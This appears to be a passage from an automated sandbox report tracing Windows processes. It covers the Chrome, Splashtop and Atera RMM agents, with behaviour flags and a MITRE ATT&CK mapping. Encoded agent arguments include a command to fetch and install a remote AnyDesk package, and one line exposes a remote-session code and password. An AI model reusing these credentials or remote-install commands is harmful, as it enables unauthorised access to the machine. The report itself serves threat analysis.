                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3240 /prefetch:1
                                2⤵
                                  PID:5240
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4500,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4596 /prefetch:1
                                  2⤵
                                    PID:5448
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4504,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4724 /prefetch:8
                                    2⤵
                                      PID:5584
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4508,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4536 /prefetch:8
                                      2⤵
                                        PID:5608
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4784,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4756 /prefetch:8
                                        2⤵
                                          PID:5444
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4828 /prefetch:8
                                          2⤵
                                            PID:5860
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4852,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5036 /prefetch:1
                                            2⤵
                                              PID:6004
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3396,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5052 /prefetch:1
                                              2⤵
                                                PID:2208
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3324,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5056 /prefetch:1
                                                2⤵
                                                  PID:2292
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5072 /prefetch:8
                                                  2⤵
                                                    PID:5112
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2352,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5368 /prefetch:8
                                                    2⤵
                                                      PID:5504
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3392,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5524 /prefetch:1
                                                      2⤵
                                                        PID:6104
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4052,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4996 /prefetch:1
                                                        2⤵
                                                          PID:6608
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5672,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3420 /prefetch:1
                                                          2⤵
                                                            PID:6120
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5112,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5504 /prefetch:1
                                                            2⤵
                                                              PID:6268
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=3436,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5620 /prefetch:1
                                                              2⤵
                                                                PID:6636
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5480,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5344 /prefetch:1
                                                                2⤵
                                                                  PID:6808
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5528,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5820 /prefetch:1
                                                                  2⤵
                                                                    PID:6180
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6028,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5984 /prefetch:8
                                                                    2⤵
                                                                      PID:7128
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5960,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=6128 /prefetch:8
                                                                      2⤵
                                                                        PID:5848
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5964,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=6196 /prefetch:1
                                                                        2⤵
                                                                          PID:1576
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6324,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=6328 /prefetch:8
                                                                          2⤵
                                                                            PID:5260
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6332,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=6360 /prefetch:8
                                                                            2⤵
                                                                            • Modifies registry class
                                                                            PID:6520
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6132,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=6152 /prefetch:1
                                                                            2⤵
                                                                              PID:3728
                                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                            1⤵
                                                                              PID:5480
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                              1⤵
                                                                                PID:5920
                                                                              • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe
                                                                                "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe"
                                                                                1⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:6136
                                                                                • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exe
                                                                                  "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exe"
                                                                                  2⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Drops file in Program Files directory
                                                                                  • Loads dropped DLL
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:5536
                                                                                  • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
                                                                                    -h
                                                                                    3⤵
                                                                                    • Loads dropped DLL
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:6080
                                                                                  • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAgent.exe
                                                                                    "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAgent.exe"
                                                                                    3⤵
                                                                                    • Loads dropped DLL
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:5208
                                                                                    • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\BdEpSDK.exe
                                                                                      "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\BdEpSDK.exe" -v
                                                                                      4⤵
                                                                                        PID:5852
                                                                                    • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAppPB.exe
                                                                                      "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAppPB.exe"
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:6044
                                                                                    • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeature.exe
                                                                                      "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeature.exe"
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4812
                                                                                      • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUtility.exe
                                                                                        SRUtility.exe -r
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5024
                                                                                    • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVirtualDisplay.exe
                                                                                      "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVirtualDisplay.exe"
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:6912
                                                                                • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
                                                                                  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
                                                                                  1⤵
                                                                                  • Drops file in Windows directory
                                                                                  PID:5436
                                                                                • C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                  "C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                  1⤵
                                                                                  • Drops file in Program Files directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:3224
                                                                                  • C:\Windows\System32\sc.exe
                                                                                    "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                    2⤵
                                                                                    • Launches sc.exe
                                                                                    PID:7048
                                                                                  • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe
                                                                                    "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "4f15bf03-15c0-455e-950b-49a4b96ffcaa" agent-api.atera.com/Production 443 or8ixLi90Mf "eyJBZENvbW1hbmRUeXBlIjo1LCJJbnN0YWxsYXRpb25GaWxlVXJsIjoiaHR0cHM6Ly9nZXQuYW55ZGVzay5jb20vOENRc3U5a3YvQW55RGVza19DdXN0b21fQ2xpZW50Lm1zaSIsIkZvcmNlSW5zdGFsbCI6ZmFsc2UsIlRhcmdldFZlcnNpb24iOiIifQ==" 001Q300000N8afVIAR
                                                                                    2⤵
                                                                                      PID:6804
                                                                                    • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                      "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "87fe1976-b4a1-44a9-8eaf-8b475d938d93" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000N8afVIAR
                                                                                      2⤵
                                                                                        PID:6396
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                          3⤵
                                                                                            PID:5012
                                                                                            • C:\Windows\system32\cscript.exe
                                                                                              cscript "C:\Program Files\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                              4⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:2696
                                                                                        • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                          "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "a9f7fa7b-1c23-4e0f-a1ce-968c8b31aa8b" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000N8afVIAR
                                                                                          2⤵
                                                                                            PID:6504
                                                                                          • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                            "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "e5624142-610d-4264-8001-cd79ce3bf80d" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000N8afVIAR
                                                                                            2⤵
                                                                                            • Writes to the Master Boot Record (MBR)
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:2604
                                                                                          • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                            "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "1aaec007-d829-40a1-9bf5-8519356c5a93" agent-api.atera.com/Production 443 or8ixLi90Mf "downloadifneeded" 001Q300000N8afVIAR
                                                                                            2⤵
                                                                                              PID:6440
                                                                                              • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUtility.exe
                                                                                                "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUtility.exe" -a "st-streamer://com.splashtop.streamer/?rmm_code=hZCDFPhK75mJ&rmm_session_pwd=a9c8483a234929c801bf046a50c3317d&rmm_session_pwd_ttl=86400"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3012
                                                                                            • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                              "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "d99de366-a0f8-4472-bd4b-fc5a1a180928" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000N8afVIAR
                                                                                              2⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:4640
                                                                                            • C:\Program Files\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe
                                                                                              "C:\Program Files\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "019b7dd5-e7c0-4d9a-8b72-ffa3e7c77e7b" agent-api.atera.com/Production 443 or8ixLi90Mf "eyJBcmd1bWVudHMiOiJ7XHUwMDIyQ29tbWFuZE5hbWVcdTAwMjI6XHUwMDIybWFpbnRlbmFuY2VcdTAwMjIsXHUwMDIyRW5hYmxlZFx1MDAyMjp0cnVlLFx1MDAyMlJlcGVhdEludGVydmFsTWludXRlc1x1MDAyMjoxMCxcdTAwMjJEYXlzSW50ZXJ2YWxcdTAwMjI6MSxcdTAwMjJSZXBlYXREdXJhdGlvbkRheXNcdTAwMjI6MX0ifQ==" 001Q300000N8afVIAR
                                                                                              2⤵
                                                                                                PID:6964
                                                                                              • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe
                                                                                                "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "0100efa4-d8f9-460e-8028-89837cc2ff3c" agent-api.atera.com/Production 443 or8ixLi90Mf "heartbeat" 001Q300000N8afVIAR
                                                                                                2⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:6516
                                                                                              • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "a46d7b8f-f15f-4daf-9094-b6c5fd059bb5" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000N8afVIAR
                                                                                                2⤵
                                                                                                • Modifies registry class
                                                                                                PID:2204
                                                                                              • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe
                                                                                                "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "b2953e5d-7f58-4021-8e49-173279d18a24" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000N8afVIAR
                                                                                                2⤵
                                                                                                  PID:7156
                                                                                                • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe
                                                                                                  "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "3f3a012b-0f0c-4398-8ca1-25dc50d89d3c" agent-api.atera.com/Production 443 or8ixLi90Mf "getlistofallupdates" 001Q300000N8afVIAR
                                                                                                  2⤵
                                                                                                    PID:6156
                                                                                                  • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe
                                                                                                    "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "088fa87a-747e-4434-a56b-4e5908e7efcd" agent-api.atera.com/Production 443 or8ixLi90Mf "eyJDb21tYW5kTmFtZSI6Imluc3RhbGxkb3RuZXQiLCJEb3ROZXRWZXJzaW9uIjoiNi4wLjM1IiwiTWFjQVJNRG93bmxvYWRVcmwiOiJodHRwczovL2Rvd25sb2FkLnZpc3VhbHN0dWRpby5taWNyb3NvZnQuY29tL2Rvd25sb2FkL3ByLzU4OTc4Y2ViLTVkZTMtNDllMi1iNTcxLTk3MjgyNWIwOGYwYS9mMWJkOWIxYmI1YjI1YjhjOWNlZTQwZWQ5YTNkODAyMy9kb3RuZXQtcnVudGltZS02LjAuMzUtb3N4LWFybTY0LnBrZyIsIk1hY1g2NERvd25sb2FkVXJsIjoiaHR0cHM6Ly9kb3dubG9hZC52aXN1YWxzdHVkaW8ubWljcm9zb2Z0LmNvbS9kb3dubG9hZC9wci8yNjkyMDY2NC1kNzU0LTRmNzYtOWM5OS1lNjkxMTYzNDhlODIvYTQwMzE1MzcxY2M2MDdjOWYxODQ3OGM5M2YyYTY3NmEvZG90bmV0LXJ1bnRpbWUtNi4wLjM1LW9zeC14NjQucGtnIiwiV2luQVJNRG93bmxvYWRVcmwiOiJodHRwczovL2Rvd25sb2FkLnZpc3VhbHN0dWRpby5taWNyb3NvZnQuY29tL2Rvd25sb2FkL3ByL2EyMjNjNDViLTQ3NzctNDA1Ni1hZWEyLTY1M2M1NzZkODExNS9iZjhhZjYzYzZlNjI1YmU0YWZhODVlYzA5M2U4MWU2NS9kb3RuZXQtcnVudGltZS02LjAuMzUtd2luLWFybTY0LmV4ZSIsIldpblg2NERvd25sb2FkVXJsIjoiaHR0cHM6Ly9kb3dubG9hZC52aXN1YWxzdHVkaW8ubWljcm9zb2Z0LmNvbS9kb3dubG9hZC9wci9jNGY2NTYyMS1iMzZiLTQ2YTktODM4MC1kNWI2NjBiZWYyN2UvMDE4NWZkNzIwNTVkY2RjYTg2MTY2Yjk5YWRkNzE2ODYvZG90bmV0LXJ1bnRpbWUtNi4wLjM1LXdpbi14NjQuZXhlIiwiV2luWDg2RG93bmxvYWRVcmwiOiJodHRwczovL2Rvd25sb2FkLnZpc3VhbHN0dWRpby5taWNyb3NvZnQuY29tL2Rvd25sb2FkL3ByL2E5MGZiNWRjLWY0ODgtNDAwZS04NWNhLTg0M2ExMzY0MGY1Ni80ODNkMjQ2MzhjYzJiZWRhZGRhYjQzNzM0YWEyZTQ0Ny9kb3RuZXQtcnVudGltZS02LjAuMzUtd2luLXg4Ni5leGUiLCJNYWNBUk1DaGVja3N1bSI6IlVlSmJHR0dWb2NwZmdpckU2eDVNN29MQzhBS2NOSjk4SDNFcmJ0L0taS0dPdWxpQ1Flc1x1MDAyQmx6Wno5XHUwMDJCcnQwdXJMZ2FEeng0cmtXZm0veWg5UWI1RFRKUT09IiwiTWFjWDY0Q2hlY2tzdW0iOiJaZFZQVmRFSG40ZXFkdlNPUksxRUpXcjdnOUt5b0RZSXp6czQzOUxKeHYvZkFRdG5iTjk3OE8yTm1pNGtRSFNkdlJJazEvNFx1MDAyQjlycTZPMEx2Q2FnL1d3PT0iLCJXaW5BUk1DaGVja3N1bSI6IldlTGhodXU3Vi96NEs2WGVubDBINDVWWDExb0ZhdHdvV1BNa2pEQ2dobmhrTm5US2tqZjc0eUFcdTAwMkJcdTAwMkJ0Ri9VU1ZDZXE2T2dRbHI2V1Y1dU1rRWwxUVdqUT09IiwiV2luWDY0Q2hlY2tzdW0iOiJEREtSSlRFanp6XHUwMDJCSWUxMldTM2Y0aHVKQlNpeXR4TkRwQlI2SXpFeHpkM2ZBb0toNVV5MkEwbTlKOFU0ZVh5VmJxeEhjZzB3M25hWW1FZFNFeEwzMEZnPT0iLCJXaW5YODZDaGVja3N1bSI6IjdtSUF5bG9IeWxIVFVJakhud3NXeVVOXHUwMDJCVWU0alk3eXBrZVx1MDAyQnEyM2xNbEdzR0hpVUc1b21scW1LOVEvYVViODhLXHUwMDJCTnBGMWNaUVpXQjVJb3ZtTzVucWN3PT0iLCJXb3Jrc3BhY2VJZCI6ImJmMGNlNDlkLTc3Y2YtNDcyMS1iZjcwLTU3Njg2MzgzYzlhYiIsIkxvZ05hbWUiOiJEb3ROZXRSdW50aW1lSW5zdGFsbGF0aW9uUmVwb3J0IiwiU2hhcmVkS2V5IjoialVJUy9UOUNSVkRlS3hZZzRVcjNhQ2hoV1F1Y1k3UFZ2d2cwekh1cUpzY3JUampRMkx3SzZVamZ1N2NBMk5wckFSMHIvU1JBWEpZWWxkUEtLRnlLS1E9PSJ9" 001Q300000N8afVIAR
                                                                                                    2⤵
                                                                                                      PID:1904
                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                        "cmd.exe" /K "cd /d C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\" /
                                                                                                        3⤵
                                                                                                        • System Time Discovery
                                                                                                        PID:6276
                                                                                                        • C:\Program Files\dotnet\dotnet.exe
                                                                                                          dotnet --list-runtimes
                                                                                                          4⤵
                                                                                                          • System Time Discovery
                                                                                                          PID:6556
                                                                                                    • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe
                                                                                                      "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "828f00e0-5a31-4305-a479-358d484b6ca0" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000N8afVIAR
                                                                                                      2⤵
                                                                                                        PID:6404
                                                                                                      • C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                        "C:\Program Files\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "ff1c68b9-1b5d-4851-8f59-305e98296df6" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000N8afVIAR
                                                                                                        2⤵
                                                                                                          PID:4236
                                                                                                          • C:\Windows\TEMP\AteraUpgradeAgentPackage\AgentPackageUpgradeAgent.exe
                                                                                                            "C:\Windows\TEMP\AteraUpgradeAgentPackage\AgentPackageUpgradeAgent.exe" "ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e" "ff1c68b9-1b5d-4851-8f59-305e98296df6" "agent-api.atera.com/Production" "443" "or8ixLi90Mf" "checkforupdates" "001Q300000N8afVIAR"
                                                                                                            3⤵
                                                                                                              PID:6112

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Reconnaissance

                                                                                                        Resource Development

                                                                                                        Initial Access

                                                                                                        Execution

                                                                                                        Persistence

                                                                                                        Event Triggered Execution

                                                                                                        2
                                                                                                        T1546

                                                                                                        Component Object Model Hijacking

                                                                                                        1
                                                                                                        T1546.015

                                                                                                        Installer Packages

                                                                                                        1
                                                                                                        T1546.016

                                                                                                        Pre-OS Boot

                                                                                                        1
                                                                                                        T1542

